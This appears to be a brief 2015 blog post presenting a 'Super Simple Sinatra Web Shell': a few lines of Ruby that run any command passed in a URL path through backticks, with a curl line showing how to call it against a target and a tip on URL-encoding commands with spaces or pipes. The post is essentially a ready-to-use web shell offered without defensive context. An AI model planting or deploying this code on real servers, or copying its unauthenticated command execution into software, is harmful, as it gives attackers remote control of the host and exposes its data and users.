Wednesday, September 23, 2015

Super Simple Sinatra Web Shell


require 'sinatra'

get '/command/:cli' do
  `#{params['cli']}`
end

To execute the command you can run:

curl -v TARGET:80/command/COMMANDHERE

In order to run commands with spaces or special chars, such as "ps aux | grep blah" then you need to URL encode the command first.